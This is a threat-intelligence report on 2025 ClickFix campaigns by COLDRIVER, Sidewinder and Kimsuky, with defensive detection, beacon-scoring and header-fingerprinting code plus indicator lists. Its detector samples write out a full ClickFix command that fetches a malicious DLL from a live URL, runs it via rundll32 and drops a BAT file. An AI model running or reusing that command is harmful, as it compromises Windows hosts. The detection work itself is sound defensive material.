| NOROBOT | Operationalized: May 2025; development: May–September 2025 | COLDRIVER operationalized this malicious DLL five days after the LOSTKEYS disclosure. The earliest version was observed in May 2025. NOROBOT acts as the primary downloader and staging component for subsequent backdoors. |
| YESROBOT | Deployment: late May 2025; duration: ~2 weeks | A cumbersome Python backdoor deployed via the earliest NOROBOT variants. GTIG observed only two deployments over a two-week period in late May before it was abandoned, likely serving as a hastily deployed stopgap following LOSTKEYS exposure. |
| MAYBEROBOT | First observed: early June 2025; preferred backdoor: June–September 2025 | A PowerShell backdoor that replaced YESROBOT due to its flexibility and lack of Python dependency. A simplified NOROBOT variant, first seen in early June 2025, fetched and executed MAYBEROBOT. It became the final, preferred backdoor, remaining unchanged and suggesting high operator confidence and low detection. |
| NOROBOT (later variants) | Simplified variant: June 2025; latest sample: late August 2025 | NOROBOT continued evolving through the summer of 2025, with delivery mechanisms and complexity changing between samples. A simplified loader variant appeared in June, while later builds seen in late August 2025 reintroduced cryptographic keys and added complexity to harden the toolchain. |
🧩 Unique Operational Pinpoints — COLDRIVER’s Rapid Adaptation (May 2025 Onward)
🔥 LOSTKEYS — Total Operational Abandonment
The defining trait of LOSTKEYS is its complete and immediate abandonment. Following its public disclosure in May 2025, not a single additional instance has been observed. This showcases COLDRIVER’s ability to rapidly discard compromised tooling and pivot its malware infrastructure with exceptional agility.
⚙️ YESROBOT — Operational Clumsiness
YESROBOT was a rare operational misstep. It required operators to issue commands as valid, complex Python code, making even simple operations (like file downloads) unusually difficult. This backdoor appears to have been a hastily deployed stopgap, quickly replaced after only two observed deployments due to its inefficiency and fragility.
🔐 NOROBOT — Key Splitting for Evasion
Early variants of NOROBOT introduced an advanced evasion tactic: the malware’s cryptographic key was split across several downloaded components and stored partially in the registry. This design ensured that defenders examining only a subset of the chain could not reconstruct or decrypt the final payload, significantly complicating forensics and reversing efforts.
🧬 MAYBEROBOT — Persistence via Logon Script
MAYBEROBOT replaced YESROBOT by leveraging a more subtle and flexible persistence mechanism: a logon script. This enabled the execution of a heavily obfuscated PowerShell loader that fetched and launched the final payload. Unlike earlier Python-heavy backdoors, MAYBEROBOT was streamlined, stealthier, and supported a custom, extensible communication protocol, making it the preferred backdoor from June through September 2025.
PKCERT — Sidewinder ClickFix Campaign
In a sophisticated cyber campaign known as “Sidewinder ClickFix”, threat actors leverage a powerful combination of psychological manipulation and technical deception by impersonating national cybersecurity authorities such as PKCERT. The operation weaponizes user trust by presenting a highly realistic warning page that alerts the victim to an “urgent and critical threat” allegedly affecting national infrastructure.
The fabricated warning pressures users into installing a mandatory security patch: a patch that does not exist. What follows is a carefully engineered social-engineering sequence: victims are guided step-by-step until they are instructed to copy a command and execute it via the Windows Win + R Run dialog. This single command is, in reality, the infection vector.
Once executed, the command acts as a digital skeleton key, silently fetching and running a remote payload that compromises the system. By exploiting both the urgency of a false national emergency and the credibility of authoritative cybersecurity entities, the Sidewinder ClickFix campaign delivers a low-friction, high-impact compromise mechanism capable of quickly infiltrating targets with severe operational consequences.
🛡️ Impersonation of National Authorities
The landing pages imitate PKCERT and other official cybersecurity bodies with precision, including copied logos, tone, formatting, and emergency-alert visual language, to create strong user trust and pressure.
⚠️ Social Engineering Through Urgency
The warning claims that national infrastructure is under attack and that immediate user action is required. This urgency is central to bypassing rational thinking and encouraging compliance.
🧬 Command-Based Infection
The final step instructs the victim to run a PowerShell command from the Win + R Run dialog. This command retrieves and executes the malicious payload directly from attacker infrastructure: the core ClickFix method.
📥 Silent Payload Retrieval
Once executed, the command silently downloads the attacker’s loader or backdoor. No UI, no warnings, and no prompts, making the compromise fast and nearly invisible to unwary users.
🧨 Sidewinder ClickFix — Infection Flow & Key Characteristics
🚦 Infection Flow — What Actually Happens
In this operation, the attacker hosts a fake national-CERT webpage that displays an urgent security alert. A modal or dialog instructs the user to:
- ✦ Press Win + R
- ✦ Paste a one-liner (PowerShell or cmd snippet)
- ✦ Hit Enter to “apply the security patch”
The one-liner silently performs a remote fetch using tools such as bitsadmin, certutil, Invoke-WebRequest, or a powershell -enc payload. It retrieves a downloader (BAT, PowerShell, DLL) which then pulls the final Sidewinder payload.
🔍 Key Characteristics
This attack chain is notable for its minimal operator effort and reliance on pure social engineering. No exploit, no macro, no malicious file — the user is the execution vector.
- ✦ Extremely low friction for the attacker
- ✦ Scales easily across multiple cloned “CERT-style” sites
- ✦ User-driven command = near-zero detection surface at initial access
- ✦ Final compromise happens silently after a single pasted command
🌐 Lure Delivery — Fake PKCERT Alert Page
When the target accesses hxxps://buildthenations[.]info/PKCERT/pkcert.html, they are presented with a threatening warning claiming detection of an unauthorized attack targeting national infrastructure and government systems. The alert insists that the user must run the provided “security verification command” immediately.
This fabricated sense of urgency and national risk is the core emotional lever that drives the victim to comply without questioning the legitimacy of the instructions.
Viewing the page source reveals a reference to script[.]js near the bottom of the HTML.
The content of script[.]js seems to resemble a reCAPTCHA and relies on the user to execute a command. This appears to target only Windows users.
🧨 Sidewinder ClickFix — Behavior of the Copied Command
⏳ Execution Delay (PING-Based Sleep)
The command begins by pinging the loopback address multiple times. This is a classic Windows trick used as a sleep: ping -n waits roughly one second between echoes, so the delay is introduced without calling any timing API, which helps the chain outlast sandboxes and behavioural engines with short analysis windows.
📥 Remote DLL Fetch via cURL
The command then uses curl to download a malicious DLL from:
hxxps://foxy580.github.io/koko/file.dll
It applies custom User-Agent and Accept headers to appear legitimate or evade detection. The file is then saved into the user’s %TEMP% directory.
💉 DLL Execution via rundll32.exe
Once downloaded, the malicious DLL is executed with rundll32.exe, which calls its exported function mogrrad. Loading a freshly downloaded DLL from %TEMP% through rundll32 with an unusual export name is consistent with numerous ClickFix-linked loaders and signals the beginning of active compromise.
📝 Activity Logging via test.bat
The command writes all previously executed steps into a BAT file named test.bat, stored in the user’s %APPDATA% directory. This may serve both as an operation log and a persistence/helper script.
▶️ Execution of test.bat
Finally, the BAT file is executed and the initial command chain exits. At this point, full control has shifted to the attacker-controlled payload and its supporting script.
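The five stages above (ping-based sleep, curl fetch with custom headers, DLL dropped in %TEMP%, rundll32 export call, BAT written to %APPDATA%) can be turned into a single detection over command lines, whether they come from RunMRU values or from process-creation events. The following is an added example written for this page, not Sidewinder tooling or a vendor rule: the regexes, thresholds and sample command lines are constructed here, and the encoded-PowerShell variant mentioned earlier is covered as well. A command is flagged when a fetch stage co-occurs with an execution stage, or when an encoded PowerShell block was typed into the Run dialog.

```python
"""Flag Sidewinder-style ClickFix one-liners in Run-dialog / process telemetry."""
import re
from typing import Dict, List, Tuple

# Stage signatures, matched against a lowercased command line. Written for this
# example from the behaviour described above; not a vendor signature set.
STAGES: Dict[str, re.Pattern] = {
    "ping_sleep":     re.compile(r'\bping(?:\.exe)?\b[^&|]*?(?:127\.0\.0\.1|localhost)'),
    "curl_fetch":     re.compile(r'\bcurl(?:\.exe)?\b[^&|]*?https?://'),
    "custom_headers": re.compile(r'\bcurl(?:\.exe)?\b[^&|]*?(?:\s-a\s|--user-agent|\s-h\s)'),
    "dll_in_temp":    re.compile(r'%temp%\\[^\s"&|,]+\.dll'),
    "rundll32_call":  re.compile(r'\brundll32(?:\.exe)?\s+"?[^\s"&|,]+\.dll"?\s*,\s*[a-z0-9_]+'),
    "bat_in_appdata": re.compile(r'%appdata%\\[^\s"&|]+\.bat'),
    "encoded_ps":     re.compile(r'\bpowershell(?:\.exe)?\b[^&|]*?\s-(?:e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}'),
}
FETCH = {"curl_fetch", "encoded_ps"}
EXECUTE = {"rundll32_call", "bat_in_appdata"}


def match_stages(cmdline: str) -> List[str]:
    """Return the names of every stage signature present in the command line."""
    low = cmdline.lower()
    return [name for name, rx in STAGES.items() if rx.search(low)]


def is_clickfix_chain(cmdline: str, from_run_dialog: bool = False) -> bool:
    """A fetch stage plus an execution stage (or a DLL staged in %TEMP%) is a
    chain. An encoded PowerShell block typed into Win+R is suspicious alone."""
    hits = set(match_stages(cmdline))
    if hits & FETCH and (hits & EXECUTE or "dll_in_temp" in hits):
        return True
    return from_run_dialog and "encoded_ps" in hits


def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """events: (source, command line). Returns flagged events with their stages."""
    flagged = []
    for source, cmd in events:
        if is_clickfix_chain(cmd, from_run_dialog=(source == "RunMRU")):
            flagged.append((source, match_stages(cmd)))
    return flagged


# Constructed sample command line reproducing the stages described on this page
# (the DLL URL is the one quoted above; nothing here downloads it).
CLICKFIX_SAMPLE = (
    r'cmd /c ping -n 3 127.0.0.1 > nul & '
    r'curl -s -A "Mozilla/5.0" -H "Accept: */*" '
    r'https://foxy580.github.io/koko/file.dll -o %TEMP%\file.dll & '
    r'rundll32.exe %TEMP%\file.dll,mogrrad & '
    r'echo rundll32.exe %TEMP%\file.dll,mogrrad > %APPDATA%\test.bat & '
    r'%APPDATA%\test.bat'
)
# Constructed events: one ClickFix chain, two benign commands, one encoded
# PowerShell one-liner pasted into the Run dialog.
SAMPLE_EVENTS = [
    ("RunMRU", CLICKFIX_SAMPLE),
    ("Sysmon-1", r"ping -n 4 8.8.8.8"),
    ("Sysmon-1", r"curl -o installer.zip https://example.invalid/installer.zip"),
    ("RunMRU", "powershell -nop -w hidden -enc " + "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
]

if __name__ == "__main__":
    for source, stages in scan(SAMPLE_EVENTS):
        print(f"[{source}] ClickFix chain: {', '.join(stages)}")
```

The stage list is what an analyst wants in the alert: a hit on rundll32_call plus dll_in_temp alone already tells the triage story, and the source field shows whether the command was typed by the user (RunMRU) or spawned by something else.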
Threat Hunting & C2 Pivot Playbook
Effective hunting for ClickFix-connected malware families means going beyond single IOCs and focusing on network fingerprints, header anomalies, behavioral patterns, and post-execution artifacts. The same logic applies when pivoting into APT-linked infrastructure such as Kimsuky’s BeaverTail C2 and COLDRIVER’s MAYBEROBOT C2, which now reuse the same social-engineering playbook: Win+R, paste, execute.
🐾 Hunting BeaverTail C2 (Kimsuky)
Based on research findings from ESET’s BeaverTail analysis, the malware communicates through predictable network behaviour. Even when staged through NPM packages or GitHub artefacts, BeaverTail converges on two hunting pillars: standardised ports and Express.js-style headers.
🔌 Standardised Ports
BeaverTail C2 servers rely primarily on TCP/443 and TCP/80 or on a dedicated pair of 1224/1225 ports (see deep-dive below), with very limited alternate-port variation. Unlike commodity C2 frameworks that constantly shuffle ports, BeaverTail’s infrastructure is surprisingly rigid.
Hunt idea: highlight outbound HTTPS to previously unseen IPs or GitHub-adjacent hosting where headers match an Express static profile but lack normal browser metadata. Header-level matching requires TLS inspection or proxy logs for HTTPS; without them, apply the profile to internet-scan data and to the plaintext 1224/1225 traffic.
📡 HTTP Header Fingerprints
BeaverTail servers commonly answer with X-Powered-By: Express and Cache-Control: public, max-age=0, while the implant’s requests omit the headers a real browser sends, such as Accept-Language, Sec-CH-* and DNT. Some variants use custom or empty User-Agent values.
These bare-bones headers are strong C2 indicators when seen talking to GitHub Pages, static CDNs or nodes already tagged in your ClickFix infrastructure set.
🜂 Hunting MAYBEROBOT C2 (COLDRIVER)
MAYBEROBOT uses a reduced, PowerShell-centric delivery chain: a ClickFix-style Win+R lure drops a heavily obfuscated script that speaks to minimalist nginx/1.18.0 endpoints. Instead of exotic ports or rotating domains, the operators rely on a signature header profile and stable hashes.
🧠 Minimalistic Header Profile
MAYBEROBOT C2 responses expose Server: nginx/1.18.0 with Transfer-Encoding: chunked, a basic Content-Type: text/html and Content-Encoding: gzip, but typically omit cache-control directives, client-hint (Accept-CH) fields and cosmetic headers like X-Powered-By.
Custom tooling can hash these headers into a HEADER_HASH that covers the header names and their stable values (not Date, ETag or Last-Modified); it stays constant even when the HTML body changes.
🎯 Behavioural C2 Focus
C2 traffic is short, repetitive and tightly timed – a by-product of logon-script execution and a compact PowerShell polling loop.
Hunting tip: look for recurring POST/GET pairs with near-identical timestamps, payload lengths and low-entropy bodies, especially when they follow a Win+R execution event in EDR telemetry.
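The hunting tip above describes three measurable properties: regular timing, stable sizes and low-entropy bodies, with POST/GET pairs close together. The following added example (written for this page, not COLDRIVER tooling or any product's beacon detector) computes those statistics per destination over constructed flow records and scores them. The destinations, thresholds (5 polls, interval and size coefficient of variation, 4.5 bits/byte) and sample traffic are all assumptions; the point is the shape of the check, which also handles the short update burst that must not score.

```python
"""Score per-destination HTTP traffic for polling-loop behaviour."""
import math
import random
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, NamedTuple


class Flow(NamedTuple):
    ts: float       # epoch seconds
    method: str     # "GET" or "POST"
    dst: str        # "host:port"
    payload: bytes  # body captured for the transaction


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8 for encrypted or compressed data, low for key=value polls."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def cv(xs: List[float]) -> float:
    """Coefficient of variation: 0 is perfectly regular, inf means too little data."""
    if len(xs) < 2:
        return float("inf")
    s, m = pstdev(xs), mean(xs)
    if s == 0:
        return 0.0
    return s / m if m else float("inf")


def profile(flows: List[Flow]) -> Dict[str, dict]:
    """Timing, size and entropy statistics over each destination's POST polls
    (all requests when there are no POSTs), plus the number of polls followed
    by a GET within 2 s, i.e. the POST/GET pairs described above."""
    by_dst: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        by_dst[f.dst].append(f)
    out = {}
    for dst, fl in by_dst.items():
        fl.sort(key=lambda f: f.ts)
        polls = [f for f in fl if f.method == "POST"] or fl
        gaps = [b.ts - a.ts for a, b in zip(polls, polls[1:])]
        out[dst] = {
            "polls": len(polls),
            "gap_cv": cv(gaps),
            "size_cv": cv([float(len(f.payload)) for f in polls]),
            "mean_entropy": mean(shannon_entropy(f.payload) for f in polls),
            "paired": sum(1 for p in polls
                          if any(g.method == "GET" and 0 < g.ts - p.ts <= 2.0 for g in fl)),
        }
    return out


def is_beacon(stats: dict, min_polls: int = 5, max_gap_cv: float = 0.15,
              max_size_cv: float = 0.2, max_entropy: float = 4.5) -> bool:
    """Assumed thresholds; tune them against your own proxy baseline."""
    return (stats["polls"] >= min_polls and stats["gap_cv"] <= max_gap_cv
            and stats["size_cv"] <= max_size_cv and stats["mean_entropy"] <= max_entropy)


def build_sample() -> List[Flow]:
    """Constructed traffic: a 60 s polling loop with POST/GET pairs, a browser
    session with irregular GETs of compressed content, and a three-request
    update check that is too short to score. Hostnames are placeholders."""
    rng = random.Random(7)
    base = 1_700_000_000.0
    flows = []
    for i in range(10):
        t = base + 60 * i + rng.uniform(-1, 1)
        flows.append(Flow(t, "POST", "c2.example.invalid:443", b"id=7f3a&task=poll&status=0"))
        flows.append(Flow(t + 0.2, "GET", "c2.example.invalid:443", b""))
    t = base
    for _ in range(10):
        t += rng.uniform(2, 120)
        blob = bytes(rng.getrandbits(8) for _ in range(rng.randint(200, 4000)))
        flows.append(Flow(t, "GET", "cdn.example.invalid:443", blob))
    for i in range(3):
        flows.append(Flow(base + 60 * i, "POST", "updates.example.invalid:443", b"ver=1.2.3"))
    return flows


if __name__ == "__main__":
    for dst, stats in profile(build_sample()).items():
        print(f"{dst}: beacon={is_beacon(stats)} {stats}")
```

The min_polls floor is what keeps a legitimate update check from scoring on timing alone; in production the same statistics should be joined with the EDR event for the Win+R execution so that the first flagged destination after a pasted command gets priority.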
🧩 Cross-Campaign Hunting Insights
Although BeaverTail (Kimsuky) and MAYBEROBOT (COLDRIVER) live in different targeting ecosystems, their operational DNA rhymes with ClickFix: script-first execution, minimal headers, and static infrastructure that leans on social engineering rather than browser exploits or drive-by chains.
🔭 Unified Detection Focus
- ✦ Outbound connections to GitHub / GitHub Pages or static hosting backing ClickFix lures.
- ✦ Bare-minimum, malformed or tool-generated header profiles (Express.js, nginx/1.18.0) lacking browser fields.
- ✦ Repeated C2 polling with identical byte size and low-entropy payloads.
- ✦ Network activity starting immediately after Win+R → PowerShell one-liner execution observed in EDR logs.
🐾 BeaverTail C2 — Deep Network Indicators
📡 Canonical BeaverTail C2 Header (Express Static Profile)
A typical BeaverTail response closely matches an Express.js static hosting profile and is highly reusable as a hunting anchor:
HTTP/1.1 200 OK
X-Powered-By: Express
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 11 Apr 2025 15:14:11 GMT
ETag: W/"66fb-196256a6270"
Content-Type: text/html; charset=UTF-8
Content-Length: 26363
Date: Tue, 07 Oct 2025 14:41:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
The combination of X-Powered-By: Express, stable ETag patterns and the absence of client headers makes this a strong signature for IDS rules and PCAP-driven threat hunting.
🔌 BeaverTail Dedicated Ports (1224 / 1225)
Beyond 80/443, BeaverTail frequently exposes a hard-coded dual-port pattern 1224 / 1225. The responses differ by port:
PORT 1224 (404 stub):
HTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Content-Length: 139
Date: <REDACTED>
Connection: keep-alive
Keep-Alive: timeout=5

PORT 1225 (live C2 content):
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: *
Access-Control-Allow-Headers: *
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
ETag: W/"442-UjoHDrvR//Rpkyw5kyBkkJo64Ic"
Vary: Accept-Encoding
Content-Encoding: gzip
Date: <REDACTED>
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

In practice:
- ✦ 1224 → 404 stub
- ✦ 1225 → live C2 content
This dual-port fingerprint is extremely rare across benign infrastructure and can be operationalised in network hunting, detection rules (for example YARA-L over network logs) and perimeter filtering.
🎯 BeaverTail C2 — Search & Discovery IOCs
🧬 Validin — Body Hash & HTML Title
In Validin, BeaverTail infrastructure clusters nicely when pivoting on the page body hash and HTML title:
- ✦ Body Hash (SHA1): 523a070ebbd1fff469932c39932064909a3ae087
- ✦ HTML Title: L-Administrator
Hosts that match both the body hash and title, plus the Express header profile and ports 1224 / 1225, are strong BeaverTail candidates.
🌐 Censys — Banner Hash Pivot
In Censys, BeaverTail nodes can be retrieved using the HTTP banner hash:
services.banner_hashes = "sha256:366ff4f112453b13fb39d2fcad1e38f4b5a3368cc0dc99fd7e4a005551c6a312"
Combine this with port filters (1224, 1225) and Express headers to reduce noise and surface high-confidence BeaverTail clusters.
🜂 MAYBEROBOT C2 — Deep Network Indicators (COLDRIVER)
📡 Canonical MAYBEROBOT Header Profile
MAYBEROBOT C2 endpoints consistently present an unusually minimalistic nginx/1.18.0 profile. Across multiple servers the header block stays consistent enough to produce the same HEADER_HASH:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 08 Oct 2025 <redacted> GMT
Content-Type: text/html
Last-Modified: Thu, 02 Oct 2025 15:27:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"68de99e0-264"
Content-Encoding: gzip
HEADER_HASH: e4c05c73a19ce06e88dd
BANNER_0_HASH: ff50f710c0c2c1ec2a76c94c6b9b9b95
🧬 Secondary Variant — Same Header Hash, Different Content
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 08 Oct 2025 <redacted> GMT
Content-Type: text/html
Last-Modified: Tue, 21 Apr 2020 14:09:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"5e9efe7d-264"
Content-Encoding: gzip
HEADER_HASH: e4c05c73a19ce06e88dd
BANNER_0_HASH: c45b6393da4cd618b14d1fd50d0433a8
Key insight: even when HTML content and Last-Modified values differ, the HEADER_HASH (e4c05c73a19ce06e88dd) remains identical, making it a powerful pivot across MAYBEROBOT infrastructure.
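The header profiles on this page (the Express static profile and 1224/1225 pair for BeaverTail, the minimal nginx/1.18.0 profile and HEADER_HASH for MAYBEROBOT) can be checked with one small piece of tooling. The following is an added example written for this page; the HEADER_HASH algorithm behind the values quoted above is not published, so the hash here is this block's own construction (status code, header names in order, and the values of non-volatile headers) and will not reproduce e4c05c73a19ce06e88dd. The profile rules and the volatile-header list are assumptions; the sample response heads are the ones shown on this page.

```python
"""Header-profile hashing and classification for the C2 profiles described above."""
import hashlib
from typing import Dict, List, Tuple

# Headers whose values change per request or deploy: their names still shape the
# profile, but their values are dropped before hashing (assumed list).
VOLATILE = {"date", "content-length", "etag", "last-modified", "expires", "set-cookie"}


def parse_response(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response head into (status line, [(name, value), ...])."""
    lines = [ln.strip() for ln in raw.strip().splitlines() if ln.strip()]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def header_hash(raw: str) -> str:
    """20-hex profile hash that survives body, Date, ETag and Last-Modified changes."""
    status, headers = parse_response(raw)
    parts = [status.split()[1]]
    for name, value in headers:
        parts.append(name if name in VOLATILE else f"{name}={value}")
    return hashlib.sha256("\n".join(parts).encode()).hexdigest()[:20]


def classify(raw: str) -> str:
    """Map a response head onto the two profiles described on this page."""
    _, headers = parse_response(raw)
    h = dict(headers)
    if h.get("x-powered-by") == "Express":
        return "beavertail-express"
    minimal_nginx = (
        h.get("server") == "nginx/1.18.0"
        and h.get("content-type", "").startswith("text/html")
        and h.get("transfer-encoding") == "chunked"
        and h.get("content-encoding") == "gzip"
        and "x-powered-by" not in h
        and "cache-control" not in h
    )
    return "mayberobot-nginx" if minimal_nginx else "unknown"


def beavertail_dual_port(responses: Dict[int, str]) -> bool:
    """True when port 1224 answers an Express 404 stub and 1225 an Express 200."""
    if 1224 not in responses or 1225 not in responses:
        return False
    s1, h1 = parse_response(responses[1224])
    s2, h2 = parse_response(responses[1225])
    return (s1.split()[1] == "404" and dict(h1).get("x-powered-by") == "Express"
            and s2.split()[1] == "200" and dict(h2).get("x-powered-by") == "Express")


# Sample response heads copied from this page (Date values redacted as shown there).
MAYBEROBOT_A = """HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 08 Oct 2025 <redacted> GMT
Content-Type: text/html
Last-Modified: Thu, 02 Oct 2025 15:27:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"68de99e0-264"
Content-Encoding: gzip"""
MAYBEROBOT_B = MAYBEROBOT_A.replace("Thu, 02 Oct 2025 15:27:28", "Tue, 21 Apr 2020 14:09:01") \
                           .replace('W/"68de99e0-264"', 'W/"5e9efe7d-264"')
BEAVERTAIL = ("HTTP/1.1 200 OK\nX-Powered-By: Express\nAccept-Ranges: bytes\n"
              "Cache-Control: public, max-age=0\nLast-Modified: Fri, 11 Apr 2025 15:14:11 GMT\n"
              'ETag: W/"66fb-196256a6270"\nContent-Type: text/html; charset=UTF-8\n'
              "Content-Length: 26363\nDate: Tue, 07 Oct 2025 14:41:19 GMT\n"
              "Connection: keep-alive\nKeep-Alive: timeout=5")
PORT_1224 = ("HTTP/1.1 404 Not Found\nX-Powered-By: Express\nAccess-Control-Allow-Origin: *\n"
             "Content-Security-Policy: default-src 'none'\nX-Content-Type-Options: nosniff\n"
             "Content-Type: text/html; charset=utf-8\nContent-Length: 139\nDate: <REDACTED>\n"
             "Connection: keep-alive\nKeep-Alive: timeout=5")
PORT_1225 = ("HTTP/1.1 200 OK\nX-Powered-By: Express\nAccess-Control-Allow-Origin: *\n"
             "Content-Type: text/html; charset=utf-8\nAccept-Ranges: bytes\n"
             "Vary: Accept-Encoding\nContent-Encoding: gzip\nDate: <REDACTED>\n"
             "Connection: keep-alive\nTransfer-Encoding: chunked")

if __name__ == "__main__":
    for label, raw in (("MAYBEROBOT_A", MAYBEROBOT_A), ("MAYBEROBOT_B", MAYBEROBOT_B),
                       ("BEAVERTAIL", BEAVERTAIL)):
        print(f"{label}: {classify(raw)} hash={header_hash(raw)}")
    print("dual-port BeaverTail:", beavertail_dual_port({1224: PORT_1224, 1225: PORT_1225}))
```

The nginx profile alone is not a verdict: nginx/1.18.0 serving a gzip-chunked default page is common enough that, as the page says, the header hash should be combined with the stock-page body hash and the other OSINT pivots before a host is labelled C2. The Express profile is stronger when it comes with the 1224/1225 pair.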
📝 HTML Fingerprint
MAYBEROBOT servers often serve the stock Welcome to nginx! page with a stable body hash:
- ✦ HTML Title: Welcome to nginx!
- ✦ Body Hash (SHA1): 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
The trio nginx/1.18.0 + HEADER_HASH + stock nginx body strongly fingerprints MAYBEROBOT C2 nodes.
🌐 OSINT Pivots (Shodan, Urlscan, Domains)
MAYBEROBOT hosts surface across multiple OSINT platforms. These artefacts help expand the C2 graph:
- ✦ Shodan host: 185.28.119.41
- ✦ Urlscan capture: urlscan.io/result/0199e545…
- ✦ Urlscan domain search: southprovesolutions.com
Correlating these datapoints with HEADER_HASH e4c05c73a19ce06e88dd and nginx/1.18.0 produces tight infrastructure clusters that can be labelled as active COLDRIVER C2 nodes.
🧨 Closing Thoughts — From ClickFix Lures to C2 Maps
ClickFix turns a single Win+R command into a full kill chain. By enriching that view with C2 fingerprints from campaigns like BeaverTail and MAYBEROBOT, defenders can move from alert-by-alert response to infrastructure-level hunting: tracking reused headers, banner hashes, body hashes and port patterns across their estate. Once this playbook is wired into SIEM/EDR detections, every new lure becomes not just an incident, but an opportunity to burn another piece of the adversary’s infrastructure.
Conclusions
The 2025 wave of ClickFix-enabled operations reveals a unified pattern across COLDRIVER, Kimsuky, Sidewinder, and related ecosystems: a strategic shift toward user-driven execution and toolchain agility. No exploits. No macros. No staged documents. Instead, a single copy-paste command weaponizes the victim against themselves: a frictionless entry point that bypasses traditional controls and compresses the attacker’s kill chain to seconds.
From COLDRIVER’s rapidly evolving NOROBOT–MAYBEROBOT pipeline to Kimsuky’s adoption of deepfake-augmented lure kits and Sidewinder’s PKCERT impersonation, the story is the same: identity trust + social pressure = initial access. Technical sophistication shows up primarily in the final payloads such as TropiDoor’s encrypted in-memory RAT or BeaverTail’s modular infostealer chain. The true innovation lies in collapsing human psychology into a reliable delivery vehicle.
⚡ Key Takeaways
Strategic Imperatives
- Identity trust is the new perimeter. Browser credential theft, session hijacking, and command-copy execution chains bypass classic detection.
- Human-layer detection must mature. Deepfake lures, CERT impersonation, and “urgent security patch” narratives amplify psychological exposure.
- Monitor the run dialog. ClickFix exploits Win + R as an execution substrate. Telemetry around RunMRU, clipboard activity, and encoded PowerShell blocks is essential.
- Treat developer ecosystems as high-risk terrain. Malicious NPM packages (BeaverTail), poisoned repositories, and cloned GitHub pages remain active vectors.
- Memory-resident payloads require behavioral defense. Tools like TropiDoor leave few clear artifacts on disk, forcing teams toward in-memory inspection.
- Iterate detection faster than attackers iterate tooling. COLDRIVER pushed three backdoor families in under 90 days. Blue teams must match this pace through continuous rule tuning and post-incident detection expansion.